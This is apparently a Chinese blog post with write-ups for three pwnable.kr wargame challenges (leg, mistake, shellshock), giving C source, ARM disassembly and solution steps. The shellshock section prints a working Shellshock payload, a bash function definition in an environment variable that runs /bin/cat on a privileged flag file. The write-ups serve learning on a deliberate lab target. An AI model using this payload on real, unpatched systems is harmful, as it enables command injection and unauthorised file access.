pwnable.kr-leg-mistake-shellshock

最新推荐文章于 2023-03-03 16:11:12 发布
最新推荐文章于 2023-03-03 16:11:12 发布
阅读量311 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_35661990/article/details/82814911
本文深入探讨了Shellshock漏洞的原理,演示了如何利用环境变量中的执行语句让bash执行任意命令,并通过实际案例解析了如何绕过权限限制获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

leg

#include <stdio.h>
#include <fcntl.h>
int key1(){
	asm("mov r3, pc\n");
}
int key2(){
	asm(
	"push	{r6}\n"
	"add	r6, pc, $1\n"
	"bx	r6\n"
	".code   16\n"
	"mov	r3, pc\n"
	"add	r3, $0x4\n"
	"push	{r3}\n"
	"pop	{pc}\n"
	".code	32\n"
	"pop	{r6}\n"
	);
}
int key3(){
	asm("mov r3, lr\n");
}
int main(){
	int key=0;
	printf("Daddy has very strong arm! : ");
	scanf("%d", &key);
	if( (key1()+key2()+key3()) == key ){
		printf("Congratz!\n");
		int fd = open("flag", O_RDONLY);
		char buf[100];
		int r = read(fd, buf, 100);
		write(0, buf, r);
	}
	else{
		printf("I have strong leg :P\n");
	}
	return 0;
}

获取flag的条件是key1+key2+key3=key;

看来是一道考察某个基础知识点的题目,关键在于asm()函数。

asm()能把()内语句写入到汇编中执行,既然这样,直接看汇编代码。

(gdb) disass key1
Dump of assembler code for function key1:
   0x00008cd4 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
   0x00008cd8 <+4>:	add	r11, sp, #0
   0x00008cdc <+8>:	mov	r3, pc
   0x00008ce0 <+12>:	mov	r0, r3
   0x00008ce4 <+16>:	sub	sp, r11, #0
   0x00008ce8 <+20>:	pop	{r11}		; (ldr r11, [sp], #4)
   0x00008cec <+24>:	bx	lr
End of assembler dump.

可以看到move r3,pc这个在key1函数中出现的语句被写到了汇编中。

PC即寄存器R15,对于ARM指令集而言,PC总是指向当前指令的下两条指令的地址,即PC的值为当前指令的地址值加8个字节程序状态寄存器。由此可知r3的值就是0x00008cdc+8,然后下一条语句出现了r0,在ARM里r0是作为函数的返回值,所以key1=r0=r3=0x00008cdc+8.

(gdb) disass key2
Dump of assembler code for function key2:
   0x00008cf0 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
   0x00008cf4 <+4>:	add	r11, sp, #0
   0x00008cf8 <+8>:	push	{r6}		; (str r6, [sp, #-4]!)
   0x00008cfc <+12>:	add	r6, pc, #1
   0x00008d00 <+16>:	bx	r6
   0x00008d04 <+20>:	mov	r3, pc
   0x00008d06 <+22>:	adds	r3, #4
   0x00008d08 <+24>:	push	{r3}
   0x00008d0a <+26>:	pop	{pc}
   0x00008d0c <+28>:	pop	{r6}		; (ldr r6, [sp], #4)
   0x00008d10 <+32>:	mov	r0, r3
   0x00008d14 <+36>:	sub	sp, r11, #0
   0x00008d18 <+40>:	pop	{r11}		; (ldr r11, [sp], #4)
   0x00008d1c <+44>:	bx	lr
End of assembler dump.

根据上一步,看到mov r0,r3 所以key2=r0=r3=PC+4但是到这里往上逆推的时候出现了bx

BX: 带状态切换的跳转。最低位为1时,切换到Thumb指令执行,为0时,解释为ARM指令执行。

关于B开头的各种指令:https://blog.youkuaiyun.com/zhaolina004/article/details/48035079

因为R6=PC+1,所以bx跳转到Thumb模式,这时PC=当前程序地址+4

所以key2=0x00008d04+4+4

(gdb) disass key3
Dump of assembler code for function key3:
   0x00008d20 <+0>:	push	{r11}		; (str r11, [sp, #-4]!)
   0x00008d24 <+4>:	add	r11, sp, #0
   0x00008d28 <+8>:	mov	r3, lr
   0x00008d2c <+12>:	mov	r0, r3
   0x00008d30 <+16>:	sub	sp, r11, #0
   0x00008d34 <+20>:	pop	{r11}		; (ldr r11, [sp], #4)
   0x00008d38 <+24>:	bx	lr
End of assembler dump.

还是一样,key3=r0=r3=lr

R14称为子程序链接寄存器LR(Link Register)有两个特殊功能,一种是每一种模式下都可以用于保存函数的返回地址,另外就是异常处理后的返回地址,如中断。

这题里的lr是作为函数的返回地址,即main函数中执行完key3函数后的下一个程序语句的地址

   0x00008d7c <+64>:	bl	0x8d20 <key3>
   0x00008d80 <+68>:	mov	r3, r0

由此可得key3=lr=0x00008d80

写个python小程序做加法

a=0x8cdc+8
b=0x8d04+0x4+0x4
c=0x8d80
d=a+b+c;
print(d);

提交结果,得到flag

mistake

这题的题目描述里有个hint,提示我们这题关键在于运算符的优先级

#include <stdio.h>
#include <fcntl.h>

#define PW_LEN 10
#define XORKEY 1

void xor(char* s, int len){
    int i;
    for(i=0; i<len; i++){
        s[i] ^= XORKEY;
    }
}

int main(int argc, char* argv[]){
    
    int fd;
    if(fd=open("/home/mistake/password",O_RDONLY,0400) < 0){
        printf("can't open password %d\n", fd);
        return 0;
    }

    printf("do not bruteforce...\n");
    sleep(time(0)%20);

    char pw_buf[PW_LEN+1];
    int len;
    if(!(len=read(fd,pw_buf,PW_LEN) > 0)){
        printf("read error\n");
        close(fd);
        return 0;       
    }

    char pw_buf2[PW_LEN+1];
    printf("input password : ");
    scanf("%10s", pw_buf2);

    // xor your input
    xor(pw_buf2, 10);

    if(!strncmp(pw_buf, pw_buf2, PW_LEN)){
        printf("Password OK\n");
        system("/bin/cat flag\n");
    }
    else{
        printf("Wrong Password\n");
    }

    close(fd);
    return 0;
}

第一个if语句里同时出现了=和<,这时候先执行<,然后才是执行=,因为password文件是可以打开的,所以open返回文件描述符0,0<0=false,所以fd=0

因此第二个if语句中的read其实是以fd作为文件描述符,即标准输入,把我们键盘输入的内容传给pwn_buf

因此这个程序是让我们在"input password"之前输入pw_buf的值,之后再输入pw_buf2的值,然后把pw_buf2的值按位异或0,接着再和pw_buf做比较,相等则strncmp返回0,执行system语句

所以可以输入0000000000 1111111111,总之pw_buf和pw_buf2每一位不同即可得到flag

shellshock

这题提示说是基于真实案例。shellshock漏洞存在于4.1版本之前的bash中。

通过往环境变量中添加执行语句,可以让bash执行任意命令

具体格式为

shellshock@ubuntu:~$ env x='() { :;}; echo v' ./bash -c "echo this is a test"

这样屏幕就会输出

v
this is a test

注意空格。

因为bash在执行之前会引入环境变量(env查看当前环境变量),这时候环境变量内如果有可执行语句,也会一起执行。

如果直接执行

shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' ./bash -c "echo this is a test"
会返回

/bin/cat: flag: Permission denied
Segmentation fault
而shellshock中既调动了bash,还让我们有了访问flag的权限。

所以直接执行

shellshock@ubuntu:~$ env x='() { :;}; /bin/cat flag' ./shellshock

得到flag

//为什么会出现Segmentation fault,还有bash在读取环境变量时为何会执行语句,以及setresuid()和setresgid()两个函数的定义并没有搞清楚。

参考https://www.jianshu.com/p/434d2d370ed2

吾梦不尽
关注
pwnable.kr第七八题 input leg
weixin_42877778的博客
02-08 460
pwnable.kr 第七题input 第八题leg
CTFHub 技能树 LD_PRELOAD
weixin_44732566的博客
03-11 2382
CTFHub 技能树 LD_PRELOAD 百度一下LD_PRELOAD:允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达...
PWN fd [pwnable.kr]CTF writeup题解系列1
重新启程
01-01 578
题目地址:http://pwnable.kr/play.php 题目地址页面,看看还是挺有意思的,还有一些图片。 看看题目: 题目比较简单,直接把解题过程列出来 root@mypwn:/ctf/work/reverse# ssh fd@pwnable.kr -p2222 The authenticity of host '[pwnable.kr]:2222 ([128.61.24...
BUUCTF
ovo_fisherman的博客
11-01 320
buu newyear
cat: data.txt: Permission deniedcat
naturly的博客
03-03 1310
cat: data.txt: Permission deniedcat
在ubuntu系统中总提示Permission denied,权限不足问题
热门推荐
RanGe的博客
01-04 5万+
问题描述: 在Ubuntu系统中使用普通用户登录进去,执行一些命令时会提示Permission denied,权限不足问题,这是由于我们使用的是普通用户,而不是系统管理员,有一些文件夹或者命令的操作权限是只有管理员才有的,所以需要对管理员账户进行设置 解决方案: 1.给管理员账户设置密码,使用管理员执行命 Ubuntu安装好后,root初始密码(默认密码)是不知道的,也没有进行设置,这里需要设置一下密码才可以使用root用户登录 1.1 先用安装Ubuntu时创建的用户登录到系统 1.2 输入命令:sudo
pwnable.kr】Toddler‘s Bottle-[collision]
weixin_45633243的博客
11-07 2973
目录导航打开题目审题找到突破口源代码分析解题步骤相关知识 打开题目审题 Daddy told me about cool MD5 hash collision today. I wanna do something like that too! ssh col@pwnable.kr -p2222 (pw:guest) 题目中提到MD5哈希碰撞,可以基本确定方向 输入命令回车,输入密码:guest 即可登录服务器。 找到突破口 照例先 ls -la col@pwnable:~$ ls
基于leg-by-leg机动的两级采样被动跟踪方法.docx
02-23
《基于leg-by-leg机动的两级采样被动跟踪方法》探讨的是如何在被动声呐系统中,利用特定的机动策略和采样技术来提高目标运动分析(TMA)的精度和效率。目标被动跟踪是通过被动观测的信息来持续估计目标运动状态的...
FROG-LEG型机械手的模型预测控制研究 (2014年)
06-12
研究了FROG- LEG型机械手的轨迹跟踪控制问题,提出将基于动力学的预测控制应用于机械手的位置控制,并利用当前时刻控制误差补偿下一周期的控制量。在分析FROG-LEG型机械手结构的基础上,首先建立了机械手的等效串联结构...
lead-leg.slx
10-08
采用双线性z变换进行超前滞后环节算法推导并进行结果验证
selenium-leg-rc-2.47.1.jar
02-26
java运行依赖jar包
PWN cmd2 [pwnable.kr]CTF writeup题解系列12
重新启程
01-02 554
涉及到shell命令绕过到知识 #include <stdio.h> #include <string.h> int filter(char* cmd){ int r=0; r += strstr(cmd, "=")!=0; r += strstr(cmd, "PATH")!=0; r += strstr(cmd, "export")!=0; r +...
CTF训练之现学现卖--SSH私钥泄露
zoleo8088的博客
06-08 1666
【原创】CTF训练之现学现卖–SSH私钥泄露 Step1 环境搭建: KALI官网下载vmware虚拟机 Virtual PC加载SSH-私钥泄露.ova (链接:https://pan.baidu.com/s/1dZzfdiWTU1XtI5bqocNosQ 提取码:45n0 ) 搭建局域网络,使vmware和vpc互通,在同一个子网 我在vmware下配置双网卡,eth0通过nat连向外部网络,...
已解决:cat: /var/log/boot.log: Permission denied
weixin_45942949的博客
03-30 3994
目录 错误: 分析: 解决办法: 方法一: 方法二:(我用下面的方法没有解决,但是大家可以试试) 虚拟机:CentOS 7 错误 打算查看boot.log日志文件的内容,出现如下错误: cat: /var/log/boot.log: Permission denied 分析 Permission denied:没有权限进行读、写、创建文件、删除文件等操作。 赋予权限就可以了。 解决办法 方法一 输入命令:su 会提示输入密码,密码是不可见的,正常输入密码即可,输入完成
Android 8遇到的问题cat: /system/build.prop: Permission denied,如果不root,有方法解决吗?
xiaoshiyun111的博客
09-06 4777
cat: /system/build.prop: Permission denied,如果不root,有方法解决吗?
Linux 访问文件 Permission denied 的原因
yasi_xi的专栏
07-12 2万+
转自:http://blog.163.com/wang_ly2442/blog/static/94943407201361142651441/ 目前有一个无登陆权限的用户:user1:x:2002:2002::/home/user1:/sbin/nologin 通过su user1 -s /bin/bash -c "cat /a/b/c/test"命令显示文件test内容,会出现下
mac android studio 执行terminal命令出现Permission denied的问题
Voctex
06-24 7672
在Android studio中,在进行打包的时候我个人习惯是用Terminal执行命令打包,因为可以执行各式各样的gradle task。在刚开始用mac book的时候,执行命令时出了问题,发现在当前项目执行命令时,mac电脑的用户需要在命令前面加(./),然后继续执行命令的时候,又出了新问题,出现了Permission denied的问题,然后网上一查,权限的问题,用了别人的解决方案一下子就好
pwnable.kr】Toddler‘s Bottle-[fd]
weixin_45633243的博客
11-06 2720
打开题目审题 Mommy! what is a file descriptor in Linux? * try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu.be/971eZhMHQQw ssh fd@pwnable.kr -p2222 (pw:guest) Linux中的文件描述符是什么。如果你是完全的初学者,可以去youtube链
MPU9250九轴传感器数据融合:扩展卡尔曼滤波(EKF)算法解析与应用——以四元数、陀螺仪和加速度计为核心 · 四元数
最新发布
08-13
MPU9250 九轴传感器的工作原理及其应用背景,重点讲解了如何利用扩展卡尔曼滤波 (EKF) 进行数据融合。文中解释了选择四元数作为状态量、三轴陀螺仪的漂移作为控制量以及三轴加速度计和磁偏角作为观测量的原因。通过这种方式,在短时间尺度上优先信任陀螺仪提供的高精度角速度数据,而在长时间尺度上则依赖于加速度计提供的稳定姿态信息。此外,还提供了 Python 实现的简单 EKF 数据融合算法代码示例。 适合人群:对传感器数据融合感兴趣的电子工程技术人员、自动化控制领域的研究人员、从事机器人导航系统开发的技术人员。 使用场景及目标:适用于需要精确测量和稳定控制的场合,如无人机飞行控制系统、自动驾驶汽车的姿态感知模块、智能穿戴设备的动作捕捉单元等。目的是提高运动信息的准确性与稳定性。 其他说明:本文不仅理论阐述详尽,而且附有实际代码示例,便于读者理解和实践。对于希望深入了解传感器数据融合技术并掌握其实现细节的专业人士而言,是一份非常有价值的参考资料。
FROG-LEG机械手预测控制轨迹跟踪研究
"FROG-LEG型机械手的模型预测控制研究 (2014年)探讨了FROG-LEG型机械手的轨迹跟踪控制策略,采用基于动力学的预测控制来提升位置控制的精度,并通过当前时刻的控制误差补偿来优化下一周期的控制输入。研究中,首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值